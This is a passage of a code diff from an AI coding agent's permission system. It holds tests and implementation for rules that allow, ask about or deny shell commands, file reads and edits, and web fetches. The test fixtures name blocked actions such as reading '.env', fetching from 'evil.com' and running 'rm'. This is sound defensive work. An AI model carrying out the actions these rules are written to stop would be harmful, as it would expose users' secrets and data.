it('three-part compound: all must pass', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)', 'Bash(npm *)', 'Bash(echo *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git add . && npm test && echo done', + }), + ).toBe('allow'); + }); + + it('three-part compound: one unmatched → default', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(git *)', 'Bash(echo *)'], + }), + ); + pm.initialize(); + expect( + pm.evaluate({ + toolName: 'run_shell_command', + command: 'git add . && npm test && echo done', + }), + ).toBe('default'); + }); + + it('isCommandAllowed also handles compound commands', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['Bash(safe-cmd *)', 'Bash(one-cmd *)'], + permissionsDeny: ['Bash(evil-cmd *)'], + }), + ); + pm.initialize(); + expect(pm.isCommandAllowed('safe-cmd a && one-cmd b')).toBe('allow'); + expect(pm.isCommandAllowed('safe-cmd a && unknown-cmd')).toBe('default'); + expect(pm.isCommandAllowed('safe-cmd a && evil-cmd b')).toBe('deny'); + }); + }); + + describe('file path evaluation', () => { + beforeEach(() => { + pm = new PermissionManager( + makeConfig({ + permissionsDeny: ['Read(.env)', 'Edit(/src/generated/**)'], + permissionsAllow: ['Read(/docs/**)'], + projectRoot: '/project', + cwd: '/project', + }), + ); + pm.initialize(); + }); + + it('denies reading a denied file', () => { + expect( + pm.evaluate({ toolName: 'read_file', filePath: '/project/.env' }), + ).toBe('deny'); + }); + + it('denies editing in a denied directory', () => { + expect( + pm.evaluate({ + toolName: 'edit', + filePath: '/project/src/generated/code.ts', + }), + ).toBe('deny'); + }); + + it('allows reading in an allowed directory', () => { + expect( + pm.evaluate({ + toolName: 'read_file', + filePath: '/project/docs/readme.md', + }), + ).toBe('allow'); + }); + + it('Read deny applies to grep_search too (meta-category)', () => { + expect( + pm.evaluate({ toolName: 'grep_search', filePath: '/project/.env' }), + ).toBe('deny'); + }); + + it('returns default for unmatched path', () => { + expect( + pm.evaluate({ + toolName: 'read_file', + filePath: '/project/src/index.ts', + }), + ).toBe('default'); + }); + }); + + describe('WebFetch domain evaluation', () => { + beforeEach(() => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['WebFetch(domain:github.com)'], + permissionsDeny: ['WebFetch(domain:evil.com)'], + }), + ); + pm.initialize(); + }); + + it('allows fetch to allowed domain', () => { + expect(pm.evaluate({ toolName: 'web_fetch', domain: 'github.com' })).toBe( + 'allow', + ); + }); + + it('allows fetch to subdomain of allowed domain', () => { + expect( + pm.evaluate({ toolName: 'web_fetch', domain: 'api.github.com' }), + ).toBe('allow'); + }); + + it('denies fetch to denied domain', () => { + expect(pm.evaluate({ toolName: 'web_fetch', domain: 'evil.com' })).toBe( + 'deny', + ); + }); + + it('returns default for unmatched domain', () => { + expect( + pm.evaluate({ toolName: 'web_fetch', domain: 'example.com' }), + ).toBe('default'); + }); + }); + + describe('isToolEnabled', () => { + it('returns false for deny-ruled tools', () => { + pm = new PermissionManager( + makeConfig({ permissionsDeny: ['ShellTool'] }), + ); + pm.initialize(); + expect(pm.isToolEnabled('run_shell_command')).toBe(false); + }); + + it('returns true for tools with only specifier deny rules', () => { + pm = new PermissionManager( + makeConfig({ permissionsDeny: ['Bash(rm *)'] }), + ); + pm.initialize(); + expect(pm.isToolEnabled('run_shell_command')).toBe(true); + }); + + it('excludeTools passed via permissionsDeny disables the tool', () => { + pm = new PermissionManager( + makeConfig({ permissionsDeny: ['run_shell_command'] }), + ); + pm.initialize(); + expect(pm.isToolEnabled('run_shell_command')).toBe(false); + }); + + it('coreTools allowlist: listed tool is enabled', () => { + pm = new PermissionManager( + makeConfig({ coreTools: ['read_file', 'Bash'] }), + ); + pm.initialize(); + expect(pm.isToolEnabled('read_file')).toBe(true); + expect(pm.isToolEnabled('run_shell_command')).toBe(true); // Bash resolves to run_shell_command + }); + + it('coreTools allowlist: unlisted tool is disabled', () => { + pm = new PermissionManager(makeConfig({ coreTools: ['read_file'] })); + pm.initialize(); + expect(pm.isToolEnabled('read_file')).toBe(true); + expect(pm.isToolEnabled('run_shell_command')).toBe(false); + expect(pm.isToolEnabled('edit')).toBe(false); + }); + + it('coreTools with specifier: tool-level check strips specifier', () => { + // "Bash(ls -l)" should register run_shell_command (specifier only affects runtime) + pm = new PermissionManager(makeConfig({ coreTools: ['Bash(ls -l)'] })); + pm.initialize(); + expect(pm.isToolEnabled('run_shell_command')).toBe(true); + expect(pm.isToolEnabled('read_file')).toBe(false); + }); + + it('empty coreTools: all tools enabled (no whitelist restriction)', () => { + pm = new PermissionManager(makeConfig({ coreTools: [] })); + pm.initialize(); + expect(pm.isToolEnabled('read_file')).toBe(true); + expect(pm.isToolEnabled('run_shell_command')).toBe(true); + }); + + it('coreTools allowlist + deny rule: deny takes precedence for listed tools', () => { + pm = new PermissionManager( + makeConfig({ + coreTools: ['read_file', 'Bash'], + permissionsDeny: ['Bash'], + }), + ); + pm.initialize(); + expect(pm.isToolEnabled('read_file')).toBe(true); + expect(pm.isToolEnabled('run_shell_command')).toBe(false); // in list but denied + }); + + it('permissionsAllow alone does NOT restrict unlisted tools (not a whitelist)', () => { + // This verifies the previous incorrect behavior is gone: permissionsAllow + // only means "auto-approve", it does NOT block unlisted tools. + pm = new PermissionManager( + makeConfig({ permissionsAllow: ['read_file'] }), + ); + pm.initialize(); + expect(pm.isToolEnabled('read_file')).toBe(true); + expect(pm.isToolEnabled('run_shell_command')).toBe(true); // not denied, just unreviewed + }); + }); + + describe('session rules', () => { + beforeEach(() => { + pm = new PermissionManager(makeConfig({})); + pm.initialize(); + }); + + it('addSessionAllowRule enables auto-approval for that pattern', () => { + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'git status' }), + ).toBe('default'); + pm.addSessionAllowRule('Bash(git *)'); + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'git status' }), + ).toBe('allow'); + }); + + it('session deny rules override allow rules', () => { + pm.addSessionAllowRule('run_shell_command'); + pm.addSessionDenyRule('run_shell_command'); + expect(pm.evaluate({ toolName: 'run_shell_command' })).toBe('deny'); + }); + }); + + describe('allowedTools via permissionsAllow', () => { + it('allow rule auto-approves matching tools/commands', () => { + pm = new PermissionManager( + makeConfig({ permissionsAllow: ['ReadFileTool', 'Bash(git *)'] }), + ); + pm.initialize(); + expect(pm.evaluate({ toolName: 'read_file' })).toBe('allow'); + expect( + pm.evaluate({ toolName: 'run_shell_command', command: 'git status' }), + ).toBe('allow'); + }); + }); + + describe('listRules', () => { + it('returns all rules with type and scope', () => { + pm = new PermissionManager( + makeConfig({ + permissionsAllow: ['ReadFileTool'], + permissionsDeny: ['ShellTool'], + }), + ); + pm.initialize(); + pm.addSessionAllowRule('Bash(git *)'); + + const rules = pm.listRules(); + expect(rules.length).toBe(3); + const sessionAllow = rules.find( + (r) => r.scope === 'session' && r.type === 'allow', + ); + expect(sessionAllow?.rule.toolName).toBe('run_shell_command'); + }); + }); +}); + +// ─── getRuleDisplayName ────────────────────────────────────────────────────── + +describe('getRuleDisplayName', () => { + it('maps read tools to "Read" meta-category', () => { + expect(getRuleDisplayName('read_file')).toBe('Read'); + expect(getRuleDisplayName('grep_search')).toBe('Read'); + expect(getRuleDisplayName('glob')).toBe('Read'); + expect(getRuleDisplayName('list_directory')).toBe('Read'); + }); + + it('maps edit tools to "Edit" meta-category', () => { + expect(getRuleDisplayName('edit')).toBe('Edit'); + expect(getRuleDisplayName('write_file')).toBe('Edit'); + }); + + it('maps shell to "Bash"', () => { + expect(getRuleDisplayName('run_shell_command')).toBe('Bash'); + }); + + it('maps web_fetch to "WebFetch"', () => { + expect(getRuleDisplayName('web_fetch')).toBe('WebFetch'); + }); + + it('maps task to "Task" and skill to "Skill"', () => { + expect(getRuleDisplayName('task')).toBe('Task'); + expect(getRuleDisplayName('skill')).toBe('Skill'); + }); + + it('returns the canonical name for unknown tools (e.g. MCP)', () => { + expect(getRuleDisplayName('mcp__server__tool')).toBe('mcp__server__tool'); + }); +}); + +// ─── buildPermissionRules ──────────────────────────────────────────────────── + +describe('buildPermissionRules', () => { + describe('path-based tools (Read/Edit)', () => { + it('generates Read rule scoped to parent directory for read_file', () => { + const rules = buildPermissionRules({ + toolName: 'read_file', + filePath: '/Users/alice/.secrets', + }); + // read_file is file-targeted → dirname gives /Users/alice, plus /** glob + expect(rules).toEqual(['Read(//Users/alice/**)']); + }); + + it('generates Read rule with directory as-is for grep_search', () => { + const rules = buildPermissionRules({ + toolName: 'grep_search', + filePath: '/external/dir', + }); + // grep_search is directory-targeted → path used as-is, plus /** glob + expect(rules).toEqual(['Read(//external/dir/**)']); + }); + + it('generates Read rule with directory as-is for glob', () => { + const rules = buildPermissionRules({ + toolName: 'glob', + filePath: '/tmp/data', + }); + expect(rules).toEqual(['Read(//tmp/data/**)']); + }); + + it('generates Read rule with directory as-is for list_directory', () => { + const rules = buildPermissionRules({ + toolName: 'list_directory', + filePath: '/home/user/docs', + }); + expect(rules).toEqual(['Read(//home/user/docs/**)']); + }); + + it('generates Edit rule scoped to parent directory for edit', () => { + const rules = buildPermissionRules({ + toolName: 'edit', + filePath: '/external/file.ts', + }); + // edit is file-targeted → dirname gives /external, plus /** glob + expect(rules).toEqual(['Edit(//external/**)']); + }); + + it('generates Edit rule scoped to parent directory for write_file', () => { + const rules = buildPermissionRules({ + toolName: 'write_file', + filePath: '/tmp/output.txt', + }); + expect(rules).toEqual(['Edit(//tmp/**)']); + }); + + it('falls back to bare display name when no filePath', () => { + const rules = buildPermissionRules({ toolName: 'read_file' }); + expect(rules).toEqual(['Read']); + }); + }); + + describe('generated rules round-trip through parseRule and matchesRule', () => { + it('Read rule for external file covers the containing directory', () => { + const rules = buildPermissionRules({ + toolName: 'read_file', + filePath: '/Users/alice/.secrets', + }); + expect(rules).toHaveLength(1); + expect(rules[0]).toBe('Read(//Users/alice/**)'); + + const parsed = parseRule(rules[0]!); + expect(parsed.toolName).toBe('read_file'); + expect(parsed.specifier).toBe('//Users/alice/**'); + expect(parsed.specifierKind).toBe('path'); + + // Should match the original file (inside the directory) + expect( + matchesRule( + parsed, + 'read_file', + undefined, + '/Users/alice/.secrets', + undefined, + { projectRoot: '/some/project', cwd: '/some/project' }, + ), + ).toBe(true); + + // Should also match other files in the same directory + expect( + matchesRule( + parsed, + 'read_file', + undefined, + '/Users/alice/.other', + undefined, + { projectRoot: '/some/project', cwd: '/some/project' }, + ), + ).toBe(true); + + // Should NOT match files in a different directory + expect( + matchesRule( + parsed, + 'read_file', + undefined, + '/Users/bob/.secrets', + undefined, + { projectRoot: '/some/project', cwd: '/some/project' }, + ), + ).toBe(false); + }); + + it('Read rule also matches other read-family tools on the same path', () => { + const rules = buildPermissionRules({ + toolName: 'grep_search', + filePath: '/external/dir', + }); + const parsed = parseRule(rules[0]!); + + // Should match grep_search on a file inside the dir + expect( + matchesRule( + parsed, + 'grep_search', + undefined, + '/external/dir/file.txt', + undefined, + { projectRoot: '/p', cwd: '/p' }, + ), + ).toBe(true); + + // Should also match read_file (Read meta-category) + expect( + matchesRule( + parsed, + 'read_file', + undefined, + '/external/dir/other.ts', + undefined, + { projectRoot: '/p', cwd: '/p' }, + ), + ).toBe(true); + }); + }); + + describe('domain-based tools', () => { + it('generates WebFetch rule with domain specifier', () => { + const rules = buildPermissionRules({ + toolName: 'web_fetch', + domain: 'example.com', + }); + expect(rules).toEqual(['WebFetch(example.com)']); + }); + + it('falls back to bare display name when no domain', () => { + const rules = buildPermissionRules({ toolName: 'web_fetch' }); + expect(rules).toEqual(['WebFetch']); + }); + }); + + describe('command-based tools', () => { + it('generates Bash rule with command specifier', () => { + const rules = buildPermissionRules({ + toolName: 'run_shell_command', + command: 'git status', + }); + expect(rules).toEqual(['Bash(git status)']); + }); + + it('falls back to bare display name when no command', () => { + const rules = buildPermissionRules({ toolName: 'run_shell_command' }); + expect(rules).toEqual(['Bash']); + }); + }); + + describe('literal-specifier tools', () => { + it('generates Skill rule with specifier', () => { + const rules = buildPermissionRules({ + toolName: 'skill', + specifier: 'Explore', + }); + expect(rules).toEqual(['Skill(Explore)']); + }); + + it('generates Task rule with specifier', () => { + const rules = buildPermissionRules({ + toolName: 'task', + specifier: 'research', + }); + expect(rules).toEqual(['Task(research)']); + }); + + it('falls back to bare display name when no specifier', () => { + const rules = buildPermissionRules({ toolName: 'skill' }); + expect(rules).toEqual(['Skill']); + }); + }); + + describe('unknown / MCP tools', () => { + it('uses the canonical name as display for MCP tools', () => { + const rules = buildPermissionRules({ + toolName: 'mcp__puppeteer__navigate', + }); + expect(rules).toEqual(['mcp__puppeteer__navigate']); + }); + }); +}); diff --git a/packages/core/src/permissions/permission-manager.ts b/packages/core/src/permissions/permission-manager.ts new file mode 100644 index 000000000..06f0548b0 --- /dev/null +++ b/packages/core/src/permissions/permission-manager.ts @@ -0,0 +1,611 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { + parseRules, + parseRule, + matchesRule, + resolveToolName, + splitCompoundCommand, +} from './rule-parser.js'; +import type { PathMatchContext } from './rule-parser.js'; +import { extractShellOperations } from './shell-semantics.js'; +import type { ShellOperation } from './shell-semantics.js'; +import type { + PermissionCheckContext, + PermissionDecision, + PermissionRule, + PermissionRuleSet, + RuleType, + RuleWithSource, + RuleScope, +} from './types.js'; + +/** + * Numeric priority for each PermissionDecision. + * Higher number = more restrictive. Used to combine decisions by taking + * the most restrictive result across base rules + virtual shell operations. + */ +const DECISION_PRIORITY: Readonly> = { + deny: 3, + ask: 2, + default: 1, + allow: 0, +}; + +/** + * Minimal interface for the parts of Config used by PermissionManager. + * Keeps the dependency explicit and avoids a circular import on the + * full Config class. + * + * Each getter already returns a fully-merged list: persistent settings rules + * plus any SDK / CLI params that have been folded in by the Config layer. + * PermissionManager therefore only needs these three getters. + */ +export interface PermissionManagerConfig { + /** Merged allow-rules (settings + coreTools + allowedTools). */ + getPermissionsAllow(): string[] | undefined; + /** Merged ask-rules (settings only). */ + getPermissionsAsk(): string[] | undefined; + /** Merged deny-rules (settings + excludeTools). */ + getPermissionsDeny(): string[] | undefined; + /** Project root directory (for resolving path patterns). */ + getProjectRoot?(): string; + /** Current working directory (for resolving path patterns). */ + getCwd?(): string; + /** + * Returns the current approval mode (plan/default/auto-edit/yolo). + * Used by `getDefaultMode()` to determine the fallback when no rule matches. + */ + getApprovalMode?(): string; + /** + * Returns the legacy coreTools allowlist. + * + * When non-empty, only the tools in this list will be considered enabled at + * the registry level — all other tools will be excluded from registration. + * This preserves the original `tools.core` whitelist semantic inside + * PermissionManager, so `createToolRegistry` can use a single + * `pm.isToolEnabled()` check without any legacy fallback. + * + * @deprecated Configure tool availability via `permissions.deny` rules + * (e.g. `"Bash"` to block all shell commands) instead. + */ + getCoreTools?(): string[] | undefined; +} + +/** + * Manages tool and command permissions by evaluating a set of + * prioritised rules against allow / ask / deny lists. + * + * Rule evaluation order (highest priority first): + * 1. deny rules → PermissionDecision.deny + * 2. ask rules → PermissionDecision.ask + * 3. allow rules → PermissionDecision.allow + * 4. (no match) → PermissionDecision.default + * + * Rules can come from three sources, checked in order within each type: + * - Session rules (in-memory only, added during the current session) + * - Persistent rules (from settings files, passed via ConfigParameters) + * + * Legacy params (coreTools / allowedTools / excludeTools) are converted + * to in-memory rules for backward compatibility with the SDK API. + */ +export class PermissionManager { + /** Persistent rules loaded from settings (all scopes merged). */ + private persistentRules: PermissionRuleSet = { + allow: [], + ask: [], + deny: [], + }; + + /** In-memory rules added for the current session only. */ + private sessionRules: PermissionRuleSet = { + allow: [], + ask: [], + deny: [], + }; + + /** + * Canonical tool names from the legacy `coreTools` allowlist. + * When non-null, `isToolEnabled()` rejects any tool not in this set. + * Populated during `initialize()` from `config.getCoreTools()`. + */ + private coreToolsAllowList: Set | null = null; + + constructor(private readonly config: PermissionManagerConfig) {} + + /** + * Initialise from the config's permission parameters. + * Must be called once before any rule lookups. + * + * The config getters already return fully-merged lists (settings + SDK params), + * so we simply parse them into typed rules. + */ + initialize(): void { + this.persistentRules = { + allow: parseRules(this.config.getPermissionsAllow() ?? []), + ask: parseRules(this.config.getPermissionsAsk() ?? []), + deny: parseRules(this.config.getPermissionsDeny() ?? []), + }; + + // Build the coreTools allowlist (legacy whitelist semantic). + // Each entry may be a bare name ("Bash", "read_file") or include a specifier + // ("Bash(ls -l)") – we normalise to canonical tool names and ignore specifiers + // because the registry check is at the tool level, not the invocation level. + const rawCoreTools = this.config.getCoreTools?.(); + if (rawCoreTools && rawCoreTools.length > 0) { + this.coreToolsAllowList = new Set( + rawCoreTools.map((t) => parseRule(t).toolName), + ); + } + } + + // --------------------------------------------------------------------------- + // Core evaluation + // --------------------------------------------------------------------------- + + /** + * Evaluate the permission decision for a given tool invocation context. + * + * @param ctx - The context containing the tool name and optional command. + * @returns A PermissionDecision indicating how to handle this tool call. + */ + evaluate(ctx: PermissionCheckContext): PermissionDecision { + const { command } = ctx; + + // For shell commands, split compound commands and evaluate each + // sub-command independently, then return the most restrictive result. + // Priority order (most to least restrictive): deny > ask > default > allow + if (command !== undefined) { + const subCommands = splitCompoundCommand(command); + if (subCommands.length > 1) { + return this.evaluateCompoundCommand(ctx, subCommands); + } + } + + return this.evaluateSingle(ctx); + } + + /** + * Evaluate a single (non-compound) context against all rules. + * + * For shell commands (run_shell_command), the result is the most restrictive + * of: + * 1. The base decision from Bash / command-pattern rules. + * 2. The decision derived from virtual file / network operations extracted + * via `extractShellOperations` — allows Read/Edit/Write/WebFetch rules + * to match equivalent shell commands (e.g. `cat` → Read, `curl` → WebFetch). + */ + private evaluateSingle(ctx: PermissionCheckContext): PermissionDecision { + const { toolName, command, filePath, domain, specifier } = ctx; + + // Build path context for resolving relative path patterns + const pathCtx: PathMatchContext | undefined = + this.config.getProjectRoot && this.config.getCwd + ? { + projectRoot: this.config.getProjectRoot(), + cwd: this.config.getCwd(), + } + : undefined; + + const matchArgs = [ + toolName, + command, + filePath, + domain, + pathCtx, + specifier, + ] as const; + + // Compute the base decision from explicit Bash/file/domain rules. + // Using an IIFE to keep the priority-cascade logic clean. + const baseDecision: PermissionDecision = (() => { + // Priority 1: deny rules (session first, then persistent) + for (const rule of [ + ...this.sessionRules.deny, + ...this.persistentRules.deny, + ]) { + if (matchesRule(rule, ...matchArgs)) return 'deny'; + } + // Priority 2: ask rules + for (const rule of [ + ...this.sessionRules.ask, + ...this.persistentRules.ask, + ]) { + if (matchesRule(rule, ...matchArgs)) return 'ask'; + } + // Priority 3: allow rules + for (const rule of [ + ...this.sessionRules.allow, + ...this.persistentRules.allow, + ]) { + if (matchesRule(rule, ...matchArgs)) return 'allow'; + } + return 'default'; + })(); + + // `deny` is the most restrictive result — no further checks needed. + if (baseDecision === 'deny') return 'deny'; + + // For shell commands: evaluate virtual file/network operations extracted + // from the command string against Read/Edit/Write/WebFetch/ListFiles rules. + // + // Virtual ops can only ESCALATE a decision (to 'ask' or 'deny'). + // A 'default' virtual result means "shell semantics have no opinion" — it + // must never downgrade an explicit 'allow' decision from a Bash rule. + // Example: `git status` has no file ops; an allow rule for `Bash(git *)` + // should return 'allow', not be downgraded to 'default'. + if (toolName === 'run_shell_command' && command !== undefined) { + const cwd = pathCtx?.cwd ?? process.cwd(); + const virtualDecision = this.evaluateShellVirtualOps( + extractShellOperations(command, cwd), + pathCtx, + ); + if ( + virtualDecision !== 'default' && + DECISION_PRIORITY[virtualDecision] > DECISION_PRIORITY[baseDecision] + ) { + return virtualDecision; + } + } + + return baseDecision; + } + + /** + * Evaluate a list of virtual operations (derived from shell command analysis) + * against all current rules. Returns the most restrictive matching decision, + * or `'default'` if no rule matches any operation. + * + * Each operation is evaluated as if it were a direct invocation of its + * `virtualTool` (e.g. `read_file`, `web_fetch`, `edit`), so Read/Edit/etc. + * rules are applied naturally. + */ + private evaluateShellVirtualOps( + ops: ShellOperation[], + _pathCtx: PathMatchContext | undefined, + ): PermissionDecision { + if (ops.length === 0) return 'default'; + + let worst: PermissionDecision = 'default'; + + for (const op of ops) { + // Evaluate the virtual operation using the standard rule-matching path. + // Since op.virtualTool ≠ 'run_shell_command', this will not recurse back + // into the shell-semantics branch. + const opDecision = this.evaluateSingle({ + toolName: op.virtualTool, + filePath: op.filePath, + domain: op.domain, + }); + + if (DECISION_PRIORITY[opDecision] > DECISION_PRIORITY[worst]) { + worst = opDecision; + if (worst === 'deny') return 'deny'; // short-circuit + } + } + + return worst; + } + + /** + * Evaluate a compound command by splitting it into sub-commands, + * evaluating each independently, and returning the most restrictive result. + * + * Restriction order: deny > ask > default > allow + * + * Example: with rules `allow: [safe-cmd *, one-cmd *]` + * - "safe-cmd && one-cmd" → both allow → allow + * - "safe-cmd && two-cmd" → allow + default → default + * - "safe-cmd && evil-cmd" (deny: [evil-cmd]) → allow + deny → deny + */ + private evaluateCompoundCommand( + ctx: PermissionCheckContext, + subCommands: string[], + ): PermissionDecision { + const PRIORITY: Record = { + deny: 3, + ask: 2, + default: 1, + allow: 0, + }; + + let mostRestrictive: PermissionDecision = 'allow'; + + for (const subCmd of subCommands) { + const subCtx: PermissionCheckContext = { + ...ctx, + command: subCmd, + }; + const decision = this.evaluateSingle(subCtx); + + if (PRIORITY[decision] > PRIORITY[mostRestrictive]) { + mostRestrictive = decision; + } + + // Short-circuit: deny is the most restrictive possible + if (mostRestrictive === 'deny') { + return 'deny'; + } + } + + return mostRestrictive; + } + + // --------------------------------------------------------------------------- + // Registry-level helper + // --------------------------------------------------------------------------- + + /** + * Determine whether a tool should be present in the tool registry. + * + * A tool is disabled (returns false) when a `deny` rule without a specifier + * (i.e. a whole-tool deny) matches. Specifier-based deny rules such as + * `"Bash(rm -rf *)"` do NOT remove the tool from the registry – they only + * deny specific invocations at runtime. + */ + isToolEnabled(toolName: string): boolean { + const canonicalName = resolveToolName(toolName); + + // If a coreTools allowlist is active, only explicitly listed tools are + // registered. This mirrors the legacy `tools.core` whitelist semantic: + // any tool NOT in the allowlist is excluded from the registry entirely. + if (this.coreToolsAllowList !== null && this.coreToolsAllowList.size > 0) { + if (!this.coreToolsAllowList.has(canonicalName)) { + return false; + } + } + + // evaluate({ toolName }) without a command will only match rules that have + // no specifier, which is the correct registry-level check. + const decision = this.evaluate({ toolName: canonicalName }); + return decision !== 'deny'; + } + + // --------------------------------------------------------------------------- + // Shell command helper + // --------------------------------------------------------------------------- + + /** + * Determine the permission decision for a specific shell command string. + * + * @param command - The shell command to evaluate. + * @returns The PermissionDecision for this command. + */ + isCommandAllowed(command: string): PermissionDecision { + return this.evaluate({ + toolName: 'run_shell_command', + command, + }); + } + + // --------------------------------------------------------------------------- + // Relevance check + // --------------------------------------------------------------------------- + + /** + * Check whether any rule (allow, ask, or deny) in the current rule set + * matches the given invocation context. + * + * This allows the scheduler to skip the full `evaluate()` call when no + * rules are relevant, preserving the tool's `getDefaultPermission()` result + * as-is. + * + * "Relevant" means at least one rule's toolName matches AND, if the rule + * has a specifier, it also matches the context's command/filePath/domain. + * + * Examples for Shell executing `git clone xxx`: + * - "Bash" → matches (tool-level rule, no specifier) + * - "Bash(git *)" → matches (git sub-command wildcard) + * - "Bash(git clone *)" → matches (exact sub-command wildcard) + * - "Bash(git add *)" → no match (different sub-command) + * - "Edit" → no match (different tool) + * + * @param ctx - Permission check context. + * @returns true if at least one rule matches. + */ + hasRelevantRules(ctx: PermissionCheckContext): boolean { + const { toolName, command, filePath, domain, specifier } = ctx; + + const pathCtx: PathMatchContext | undefined = + this.config.getProjectRoot && this.config.getCwd + ? { + projectRoot: this.config.getProjectRoot(), + cwd: this.config.getCwd(), + } + : undefined; + + const matchArgs = [ + toolName, + command, + filePath, + domain, + pathCtx, + specifier, + ] as const; + + const allRules = [ + ...this.sessionRules.allow, + ...this.persistentRules.allow, + ...this.sessionRules.ask, + ...this.persistentRules.ask, + ...this.sessionRules.deny, + ...this.persistentRules.deny, + ]; + + if (allRules.some((rule) => matchesRule(rule, ...matchArgs))) return true; + + // For shell commands: also check whether any virtual file/network operation + // extracted from the command has a relevant rule. This ensures the PM is + // consulted (and the confirmation dialog shown) when Read/Edit/etc. rules + // would match equivalent shell commands. + if (ctx.toolName === 'run_shell_command' && ctx.command !== undefined) { + const cwd = pathCtx?.cwd ?? process.cwd(); + const ops = extractShellOperations(ctx.command, cwd); + if ( + ops.some((op) => { + const opMatchArgs = [ + op.virtualTool, + undefined, + op.filePath, + op.domain, + pathCtx, + undefined, + ] as const; + return allRules.some((rule) => matchesRule(rule, ...opMatchArgs)); + }) + ) { + return true; + } + } + + return false; + } + + // --------------------------------------------------------------------------- + // Session rule management + // --------------------------------------------------------------------------- + + /** + * Add a session-level allow rule (in-memory, cleared when the session ends). + * Used when the user clicks "Always allow for this session". + * + * @param raw - The raw rule string, e.g. "Bash(git status)". + */ + addSessionAllowRule(raw: string): void { + if (raw && raw.trim()) { + this.sessionRules.allow.push(parseRule(raw)); + } + } + + /** + * Add a session-level deny rule (in-memory, cleared when the session ends). + */ + addSessionDenyRule(raw: string): void { + if (raw && raw.trim()) { + this.sessionRules.deny.push(parseRule(raw)); + } + } + + /** + * Add a session-level ask rule (in-memory, cleared when the session ends). + */ + addSessionAskRule(raw: string): void { + if (raw && raw.trim()) { + this.sessionRules.ask.push(parseRule(raw)); + } + } + + // --------------------------------------------------------------------------- + // Persistent rule management + // --------------------------------------------------------------------------- + + /** + * Add a single persistent rule to the specified type. + * This modifies the in-memory rule set; the caller is responsible for + * persisting the change to disk (e.g. by writing to settings.json). + * + * @param raw - The raw rule string, e.g. "Bash(git *)" + * @param type - 'allow' | 'ask' | 'deny' + * @returns The parsed rule that was added. + */ + addPersistentRule(raw: string, type: RuleType): PermissionRule { + const rule = parseRule(raw); + // Deduplicate: skip if a rule with the same raw string already exists + const exists = this.persistentRules[type].some((r) => r.raw === rule.raw); + if (!exists) { + this.persistentRules[type].push(rule); + } + return rule; + } + + /** + * Remove a persistent rule matching the given raw string from the + * specified type. Removes the first match only. + * + * @returns true if a rule was removed, false if no matching rule was found. + */ + removePersistentRule(raw: string, type: RuleType): boolean { + const rules = this.persistentRules[type]; + const idx = rules.findIndex((r) => r.raw === raw); + if (idx !== -1) { + rules.splice(idx, 1); + return true; + } + return false; + } + + // --------------------------------------------------------------------------- + // Default mode + // --------------------------------------------------------------------------- + + /** + * Return the current default approval mode from config. + * This is used by the UI layer when `evaluate()` returns 'default' to + * determine the actual behavior (ask vs allow). + */ + getDefaultMode(): string { + return this.config.getApprovalMode?.() ?? 'default'; + } + + /** + * Update the persistent deny rules (called after migrating settings). + * Replaces the persistent deny rule set entirely. + */ + updatePersistentRules(ruleSet: Partial): void { + if (ruleSet.allow !== undefined) { + this.persistentRules.allow = ruleSet.allow; + } + if (ruleSet.ask !== undefined) { + this.persistentRules.ask = ruleSet.ask; + } + if (ruleSet.deny !== undefined) { + this.persistentRules.deny = ruleSet.deny; + } + } + + // --------------------------------------------------------------------------- + // Listing rules (for /permissions UI) + // --------------------------------------------------------------------------- + + /** + * Return all active rules with their types and scopes, suitable for + * display in the /permissions dialog. + */ + listRules(): RuleWithSource[] { + const result: RuleWithSource[] = []; + + const addRules = ( + rules: PermissionRule[], + type: RuleType, + scope: RuleScope, + ) => { + for (const rule of rules) { + result.push({ rule, type, scope }); + } + }; + + addRules(this.sessionRules.deny, 'deny', 'session'); + addRules(this.persistentRules.deny, 'deny', 'user'); + addRules(this.sessionRules.ask, 'ask', 'session'); + addRules(this.persistentRules.ask, 'ask', 'user'); + addRules(this.sessionRules.allow, 'allow', 'session'); + addRules(this.persistentRules.allow, 'allow', 'user'); + + return result; + } + + /** + * Return a summary of active allow rules (raw strings), including + * both session and persistent rules. Used for telemetry. + */ + getAllowRawStrings(): string[] { + return [ + ...this.sessionRules.allow.map((r) => r.raw), + ...this.persistentRules.allow.map((r) => r.raw), + ]; + } +} diff --git a/packages/core/src/permissions/rule-parser.ts b/packages/core/src/permissions/rule-parser.ts new file mode 100644 index 000000000..8667603b4 --- /dev/null +++ b/packages/core/src/permissions/rule-parser.ts @@ -0,0 +1,865 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import path from 'node:path'; +import os from 'node:os'; +import picomatch from 'picomatch'; + +/** + * Normalize a filesystem path to use POSIX-style forward slashes. + * + * On Windows, `path.join()` produces backslash-separated paths, but the + * permission rule system and picomatch both work with forward slashes. + * This helper ensures consistent path separators across all platforms. + * + * Examples: + * toPosixPath('C:\\Users\\foo\\bar') → 'C:/Users/foo/bar' + * toPosixPath('/home/user/project') → '/home/user/project' (no-op on POSIX) + */ +function toPosixPath(p: string): string { + return p.replace(/\\/g, '/'); +} +import type { + PermissionCheckContext, + PermissionRule, + SpecifierKind, +} from './types.js'; + +// ───────────────────────────────────────────────────────────────────────────── +// Tool name aliases & categories +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Map of known tool name aliases to their canonical names. + * Covers all built-in tools plus common aliases (including Claude Code's "Bash"). + */ +export const TOOL_NAME_ALIASES: Readonly> = { + // Shell tool + run_shell_command: 'run_shell_command', + Shell: 'run_shell_command', + ShellTool: 'run_shell_command', + Bash: 'run_shell_command', // Claude Code compatibility + + // Edit tool — "Edit" is also a meta-category covering edit + write_file + edit: 'edit', + Edit: 'edit', + EditTool: 'edit', + + // Write File tool — also matched by "Edit" meta-category rules + write_file: 'write_file', + WriteFile: 'write_file', + WriteFileTool: 'write_file', + Write: 'write_file', + + // Read File tool — "Read" is also a meta-category covering read_file + grep + glob + list_directory + read_file: 'read_file', + ReadFile: 'read_file', + ReadFileTool: 'read_file', + Read: 'read_file', + + // Grep tool — also matched by "Read" meta-category rules + grep_search: 